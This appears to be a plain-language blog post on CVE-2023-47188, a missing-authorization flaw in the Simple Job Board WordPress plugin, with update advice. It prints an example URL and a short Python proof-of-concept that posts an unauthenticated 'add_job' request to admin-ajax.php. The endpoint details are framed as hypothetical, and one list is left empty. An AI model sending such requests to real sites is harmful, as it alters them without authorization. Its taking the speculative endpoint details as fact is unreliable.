CVE-2023-47188 - How a Missing Authorization Vulnerability in PressTigers Simple Job Board Lets Attackers Exploit Weak Access Controls

A dangerous issue, CVE-2023-47188, can let attackers exploit missing authorization controls in versions of the PressTigers Simple Job Board WordPress plugin, up to version 2.10.5. If you’re using this plugin, you should patch it immediately. This post breaks down the vulnerability in simple terms, shows how it works (with code!), and links you to more resources.

What is Simple Job Board & Who is Vulnerable?

Simple Job Board is a super-popular WordPress plugin that helps website owners manage job listings. If you’re a company, recruiter, or even a blogger who wants to share jobs, this plugin is great and super widespread.

But: All versions up to 2.10.5 have a dangerous bug. If someone knows about this, they can totally bypass security — no password, no admin rights, nothing.

If you’re running a Simple Job Board under version 2.10.6, you’re vulnerable.

The Problem: Missing Authorization

Authorization means “checking if you’re actually allowed to do something.” Simple Job Board forgot to check, in multiple places!

Imagine leaving your front door unlocked – anyone can walk in and rearrange your furniture. Here, anyone could:

The Core of the Bug

The plugin’s backend AJAX handlers (the code WordPress uses to process requests) didn’t verify if a user had permission to do admin-level actions. Anyone – logged in or sometimes even logged out – could POST requests directly to those AJAX actions and change core job board data.

Suppose the plugin gives out a URL like this

/wp-admin/admin-ajax.php?action=add_job&title=EvilJob123&desc=ThisIsABadJob

If you hit this URL, *the plugin just obediently adds the job*. It doesn’t ask if you’re allowed.

Here’s a simple Python proof-of-concept that adds a job via the AJAX action

import requests

# Replace with your vulnerable site
site_url = "https://vulnerable-site.com";

data = {
    'action': 'add_job',
    'title': 'HackedByCVE202347188',
    'desc': 'This position was added by an unauthorized actor!'
}
response = requests.post(f"{site_url}/wp-admin/admin-ajax.php", data=data)
print("Server response:", response.text)

With this code, any user (even not logged in, in some cases) can add jobs, applications, or worse — without being an admin.

How to Fix It

Update Simple Job Board to at least version 2.10.6.
Official plugin repository

If you can’t update, disable the plugin immediately.

Original References

- NIST CVE Details for CVE-2023-47188
- WPScan Vulnerability Database Entry
- Wordfence Advisory

Final Thoughts

Authorization mistakes like CVE-2023-47188 are shockingly common in WordPress plugins — and the fallout can be huge. If you’re running Simple Job Board, or really any plugin, keep it up to date! And if you run a custom plugin, always check if your AJAX actions have proper permission checks.

If you found this post helpful, share it with other WordPress users and help secure the web!

*This post is exclusive content. For all the latest security alerts and breakdowns in plain English, follow me here!*

Timeline

Published on: 01/02/2025 12:15:15 UTC